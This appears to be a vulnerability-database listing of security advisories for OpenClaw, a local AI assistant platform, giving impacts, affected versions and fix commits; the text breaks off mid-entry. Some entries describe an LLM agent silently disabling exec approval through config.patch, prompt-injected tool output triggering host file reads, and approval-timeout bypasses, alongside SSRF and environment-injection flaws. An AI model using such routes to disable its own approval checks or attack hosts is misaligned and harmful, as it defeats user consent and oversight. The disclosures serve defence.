OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch` ## Summary Agentic Consent Bypass: LLM Agent Can Silently Disable Exec Approval via `config.patch` ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Maintainers accepted this issue, fixed it in 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `76411b2afc4ae721e36c12e0ea24fd23e2fed61e` — 2026-03-27T09:42:15Z OpenClaw thanks @YLChen-007 for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-axp9-mt9z-gkgw
Aliases: CVE-2026-41374 GHSA-hhff-fj5f-qg48 |
OpenClaw runs Discord audio preflight transcription before member authorization ## Summary Discord audio preflight transcription before member authorization ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-aye6-1fwu-nkc5
Aliases: GHSA-g86v-f9qv-rh6m |
OpenClaw SSRF guard misses four IPv6 special-use ranges ## Summary The SSRF/IP classifier treated several IPv6 special-use ranges as public and allowed fetches to proceed. ## Impact An attacker who controlled a fetched URL could target internal or non-routable IPv6 addresses that should have been blocked by the SSRF guard. ## Affected Component `src/shared/net/ip.ts, src/infra/net/ssrf.*` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `d61f8e5672` (`Net: block missing IPv6 special-use ranges`). OpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-b9w3-w2nq-cqg6
Aliases: CVE-2026-41404 GHSA-g374-mggx-p6xc |
OpenClaw: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode ## Summary Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode ## Current Maintainer Triage - Normalized severity: high - Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8b88b927cb0747ad24d95b07d35682bf85dc5b0e` — 2026-03-30T14:19:00+01:00 OpenClaw thanks @north-echo for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-bg1d-gmxy-wkc6
Aliases: CVE-2026-41332 GHSA-m866-6qv5-p2fg |
OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override ## Summary Host execution env sanitization did not block `GIT_TEMPLATE_DIR` or `AWS_CONFIG_FILE`, even though both can redirect trusted tooling to attacker-controlled content. ## Impact An approved exec request could redirect git or AWS CLI behavior through attacker-controlled configuration and execute untrusted code or load attacker-selected credentials. ## Affected Component `src/infra/host-env-security-policy.json, src/infra/host-env-security.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `6eb82fba3c` (`Infra: block additional host exec env keys`). OpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-bgwh-spue-yybk
Aliases: CVE-2026-34511 GHSA-9jpj-g8vv-j5mf |
OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter ## Summary Before OpenClaw 2026.4.2, the Gemini OAuth flow reused the PKCE verifier as the OAuth `state` value. Because the provider reflected `state` back in the redirect URL, the verifier could be exposed alongside the authorization code. ## Impact Anyone who could capture the redirect URL could learn both the authorization code and the PKCE verifier, defeating PKCE's interception protection for that flow and enabling token redemption. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `a26f4d0f3ef0757db6c6c40277cc06a5de76c52f` — separate OAuth state from the PKCE verifier OpenClaw thanks @BG0ECV for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-bk76-1ctt-tkaw
Aliases: GHSA-35cq-wv6v-88xf |
Duplicate Advisory: OpenClaw affected by SSRF via unguarded image download in fal provider ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-qxgf-hmcj-3xw3. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline. |
Affected by 150 other vulnerabilities. |
|
VCID-bkya-73v8-bber
Aliases: CVE-2026-42423 GHSA-q2gc-xjqw-qp89 |
OpenClaw: strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts ## Impact strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts. The approval-timeout fallback could allow inline eval commands that strictInlineEval was meant to require explicit approval for. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-bnfh-rsk9-cfea
Aliases: CVE-2026-35651 GHSA-4hmj-39m8-jwc7 |
OpenClaw has ACP CLI approval prompt ANSI escape sequence injection ## Summary ACP CLI approval prompt ANSI escape sequence injection ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `>= 2026.2.13, <= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details ACP tool titles could previously carry ANSI control sequences into approval prompts and permission logs, letting untrusted tool metadata spoof terminal output. Commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60` sanitizes tool titles at the source and broadens ANSI stripping to full CSI sequences. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60`. ## Fix Commit(s) - `464e2c10a5edceb380d815adb6ff56e1a4c50f60` |
Affected by 150 other vulnerabilities. |
|
VCID-bzw7-yvu2-yqa2
Aliases: CVE-2026-41395 GHSA-8689-gm9g-jgr6 |
OpenClaw: Voice-call Plivo V3 webhook replay key uses unsorted URL, allowing replay via query-parameter reordering ## Summary Plivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key. ## Impact An attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing. ## Affected Component `extensions/voice-call/src/webhook-security.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `85777e726c` (`Voice Call: canonicalize Plivo V3 replay key`). |
Affected by 150 other vulnerabilities. |
|
VCID-c25h-khws-2fc3
Aliases: GHSA-f3h5-h452-vp3j |
OpenClaw: Nostr profile mutation routes allowed operator.write config persistence ## Summary Nostr profile mutation routes allowed operator.write config persistence. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Nostr plugin HTTP profile routes could persist profile config through a path that did not require admin authority. ## Technical Details The fix requires `operator.admin` scope for Nostr profile mutation routes. ## Fix The issue was fixed in #63553. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `6517c700de9bb0ee11b41ab625ef3b63d01b6083` - PR: #63553 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-c4yt-z48z-zygv
Aliases: CVE-2026-41341 GHSA-6336-qqw9-v6x6 |
OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message ## Summary Discord Component Interaction Misclassifies Group DM as Direct Message ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-c76v-4577-n7c6
Aliases: CVE-2026-41335 GHSA-hr8g-2q7x-3f4w |
OpenClaw Has a Gateway Control Interface Information Disclosure Vulnerability ## Summary OpenClaw Gateway Control Interface Information Disclosure Vulnerability ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Released Control UI bootstrap JSON did expose version and assistant agent id, but that is low-severity fingerprinting or info disclosure only; unreleased c5c10adc trims the payload. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `c5c10adc022f42eb75ebb3bf364dd607738683b3` — 2026-03-30T15:08:19+01:00 OpenClaw thanks @topsec-bunney for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-carm-gpgh-wbbf
Aliases: CVE-2026-41364 GHSA-fv94-qvg8-xqpw |
OpenClaw: SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host ## Summary SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real in shipped v2026.3.28: SSH sandbox tar upload lacked pre-upload symlink escape rejection until 3d5af14984 on 2026-03-31; maintainers already accepted it and the fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `3d5af14984ac1976c747a8e11581d697bd0829dc` — 2026-03-31T19:56:45+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-cbuu-4d6c-rben
Aliases: CVE-2026-42428 GHSA-3vvq-q2qc-7rmp |
OpenClaw B-M3: ClawHub package downloads are not enforced with integrity verification ## Impact B-M3: ClawHub package downloads are not enforced with integrity verification. ClawHub downloads could install plugin archives without enforcing archive or per-file integrity metadata. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-csnc-r6fv-j3en
Aliases: GHSA-jp4j-q5fc-58gv |
OpenClaw's Discord component interaction ingress skips guild/channel policy enforcement ## Summary Discord button and component interaction ingress did not consistently reapply the same guild and channel policy gates used for normal inbound messages. ## Impact Users could trigger privileged component actions from contexts that should have been blocked by Discord channel policy. ## Affected Component `extensions/discord/src/monitor/agent-components.ts` ## Fixed Versions - Affected: `>= 2026.2.14, <= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `511093d4b3` (`Discord: apply component interaction policy gates`). |
Affected by 150 other vulnerabilities. |
|
VCID-cvmw-sxfq-dyhz
Aliases: CVE-2026-41346 GHSA-wwfp-w96m-c6x8 |
OpenClaw: Pairing pending-request caps were enforced per channel instead of per account ## Summary Before OpenClaw 2026.3.31, pending pairing-request caps were enforced per channel file instead of per account. On multi-account channel setups, requests from other accounts could fill the shared pending window and block new pairing challenges on an unaffected account. ## Impact This issue could deny new pairing or onboarding on another account until an existing request was approved or expired. It was an availability-only bug; it did not allow cross-account approval, data access, or authorization bypass. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `>= 2026.2.26, < 2026.3.31` - Patched versions: `>= 2026.3.31` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `9bc1f896c8cd325dd4761681e9bdb8c425f69785` — scope pending request caps per account ## Release Process Note The fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-cwd3-ecym-sfaw
Aliases: CVE-2026-35645 GHSA-h4jx-hjr3-fhgc |
OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin` ## Summary Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin` ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Gateway plugin subagent fallback `deleteSession` previously dispatched `sessions.delete` with a synthetic `operator.admin` runtime scope when no request-scoped client existed. Commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` binds deletion to the caller scope instead of minting admin scope. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`. ## Fix Commit(s) - `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` |
Affected by 150 other vulnerabilities. |
|
VCID-d864-qy75-c3dx
Aliases: CVE-2026-35664 GHSA-77w2-crqv-cmv3 |
OpenClaw: Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing ## Summary Feishu Raw card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Feishu raw card sends could previously mint legacy callback payloads that bypassed DM pairing and let unpaired recipients reach callback handling. Commit `81c45976db532324b5a0918a70decc19520dc354` rejects legacy raw-card command payloads so callbacks stay on the normal paired path. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81c45976db532324b5a0918a70decc19520dc354`. ## Fix Commit(s) - `81c45976db532324b5a0918a70decc19520dc354` |
Affected by 150 other vulnerabilities. |
|
VCID-d8v2-gft5-buee
Aliases: CVE-2026-41354 GHSA-rxmx-g7hr-8mx4 |
OpenClaw: Zalo replay dedupe keys could suppress messages across chats or senders ## Summary Before OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates. ## Impact Cross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @D0ub1e-D for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-da47-zdf1-mfgf
Aliases: CVE-2026-41385 GHSA-jjw7-3vjf-fg5j |
## Summary OpenClaw Nostr privateKey config redaction bypass leaks plaintext signing key via config.get ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still models Nostr privateKey as plain string so config views can expose it, and the secret-schema fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `57700d716f660591fb6e09727f3ca8041fa48b9d` — 2026-03-31T19:55:03+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @ccreater222 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-dbcw-brhj-k7hs
Aliases: CVE-2026-35646 GHSA-mf5g-6r6f-ghhm |
OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token ## Summary Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Weak Webhook Token ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Synology Chat webhook auth previously rejected invalid tokens without throttling repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` adds repeated-guess throttling before auth failure responses. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`. ## Fix Commit(s) - `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` |
Affected by 150 other vulnerabilities. |
|
VCID-dfdk-dhwf-9yaj
Aliases: CVE-2026-43528 GHSA-8372-7vhw-cm6q |
OpenClaw: config.get redaction bypass through sourceConfig and runtimeConfig aliases ## Summary config.get redaction bypass through sourceConfig and runtimeConfig aliases. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact An authenticated gateway client with config read access could receive unredacted secrets through alias fields that survived redaction, including provider API keys, gateway auth material, and channel credentials. ## Technical Details The fix explicitly overwrites `sourceConfig` and `runtimeConfig` with the same redacted copies used for `resolved` and `config`, including the invalid-snapshot branch. Tests now cover both alias fields. ## Fix The issue was fixed in #66030. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `86734ef93a2f25063371b04f1946eb300548acd4` - PR: #66030 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-djqx-bwuu-4uc1
Aliases: CVE-2026-35628 GHSA-vcx4-4qxg-mfp4 |
OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret ## Summary Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Telegram webhook auth previously rejected bad secrets but did not throttle repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` adds repeated-guess throttling before auth failure responses. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`. ## Fix Commit(s) - `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` ## Release Process Note `2026.3.25` is the next planned OpenClaw release version in `package.json`. This advisory is being published ahead of that npm release so the draft is no longer blocked; once `2026.3.25` is published, the structured patched-version metadata will match the released artifact. | There are no reported fixed by versions. |
|
VCID-dmse-bb22-rkcj
Aliases: GHSA-jf56-mccx-5f3f |
OpenClaw: Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel ## Impact Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel. An authenticated wake hook or mapped wake payload could be promoted into the trusted System prompt channel instead of an untrusted event. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @tdjackey for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-dv5s-pvw1-a7fu
Aliases: CVE-2026-45004 GHSA-r39h-4c2p-3jxp |
OpenClaw vulnerable to arbitrary code execution via attacker-controlled setup-api.js loaded from cwd during env-key resolution ## Summary OpenClaw's bundled plugin setup resolver could fall back to `process.cwd()` while resolving provider setup metadata. If a user ran an OpenClaw command from an attacker-controlled repository containing `extensions/<plugin>/setup-api.js`, OpenClaw could load and execute that JavaScript during ordinary provider/model status resolution. ## Impact This is arbitrary JavaScript execution in the OpenClaw process under the current user account. A malicious repository could run code when the user executed commands such as provider/model inspection from that directory. The issue does not require gateway network exposure, but it does require user interaction: the user must run OpenClaw from a directory containing the attacker-controlled setup file. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected: versions before `2026.4.23` - Fixed: `2026.4.23` - Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23` ## Fix OpenClaw now resolves bundled setup fallbacks only from the canonical package/repository root and no longer includes `process.cwd()` as a trusted setup-api search root. A regression test verifies that a workspace-local `extensions/<plugin>/setup-api.js` is not loaded through provider setup resolution. ## Fix Commit(s) - `993781e6e6eaf50f033cfc3e3bf4f47059740707` (`fix(plugins): ignore cwd setup-api fallback`) ## Severity Severity remains `high` because successful exploitation allows arbitrary code execution under the user running OpenClaw. The CVSS vector is local/user-interaction scoped rather than network-only because the victim must run OpenClaw from an attacker-controlled directory. |
Affected by 0 other vulnerabilities. |
|
VCID-e25p-j5ed-yqfz
Aliases: GHSA-93rg-2xm5-2p9v |
OpenClaw's Gateway Control UI bootstrap config required Gateway auth ## Summary Gateway Control UI bootstrap config required Gateway auth. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact When Gateway authentication was enabled, the Control UI bootstrap config endpoint could still be read without a valid Gateway token. That response could expose sensitive bootstrap/config fields intended only for authenticated Control UI sessions. ## Fix The bootstrap config route now goes through the same Gateway read-auth path as other authenticated Control UI reads. Regression tests cover unauthenticated rejection, valid-token access, and basePath handling. ## Fix Commit(s) - 2321d67263bc710e357644d59f746b08d891051b ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @zsxsoft for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-e4ac-qm17-qbf5
Aliases: GHSA-w9j9-w4cp-6wgr |
## Impact OpenClaw Host-Exec Environment Variable Injection. Host exec could inherit environment variables that influence interpreters, shells, or build tools. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.3.28` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @wsparks-vc for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-fekn-d6f3-xfa6
Aliases: CVE-2026-41347 GHSA-mhr7-2xmv-4c4q |
OpenClaw: HTTP operator endpoints lack browser-origin validation in trusted-proxy mode ## Summary HTTP operator endpoints lack browser-origin validation in trusted-proxy mode ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: This is a real trusted-proxy HTTP CSRF or browser-origin gap in released tags, but it is not critical because it depends on identity-bearing trusted-proxy browser deployments rather than the shared-secret HTTP operator model. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d` — 2026-03-31T19:49:26+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-fuda-zxu8-gbb4
Aliases: GHSA-525j-hqq2-66r4 |
OpenClaw: Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0 ## Summary Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The sandbox browser CDP relay could bind too broadly, exposing Chrome DevTools Protocol access outside the intended local/sandbox source range. ## Technical Details The fix enforces CDP source-range restriction by default and avoids broad `0.0.0.0` exposure unless explicitly configured. ## Fix The issue was fixed in #61404. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `fbf11ebdb7110632f93926d0ac7b48f04cb44d77` - PR: #61404 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-g3hg-peh1-tudm
Aliases: CVE-2026-41393 GHSA-q9w8-cf67-r238 |
OpenClaw: macOS Tailnet DNS Spoofing & Credential Exfiltration ## Summary macOS Wide-Area Discovery Accepts Arbitrary Tailnet Peer as DNS Authority and Exfiltrates Operator Credentials ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped macOS discovery steering bug, but exploitation needs same-tailnet position, a CA-trusted endpoint, and user selection, so medium not high. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a23c33a681f8c1b22dc793995acc4c5c4b568346` — 2026-03-31T10:04:11+01:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-g8r6-x6s5-uydq
Aliases: CVE-2026-41331 GHSA-m6fx-m8hc-572m |
OpenClaw: Telegram audio preflight transcription enables resource consumption by unauthorized senders ## Summary Telegram audio preflight transcription enables resource consumption by unauthorized senders ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still lets unauthorized Telegram group senders trigger audio preflight before allowlist enforcement, but the real impact is resource or billing burn rather than direct data exposure or host compromise. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `c4fa8635d03943ffe9e294d501089521dca635c5` — 2026-03-30T12:19:31+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-gk95-28x9-17dk
Aliases: GHSA-gfg9-5357-hv4c |
OpenClaw: Webchat audio embedding could read local files without local-root containment ## Impact OpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths. If an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check. The impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected versions: `<= 2026.4.14` - Patched version: `2026.4.15` The latest public release, `2026.4.21`, also contains the fix. ## Patches The public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding. Fix commit: - `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde` ## 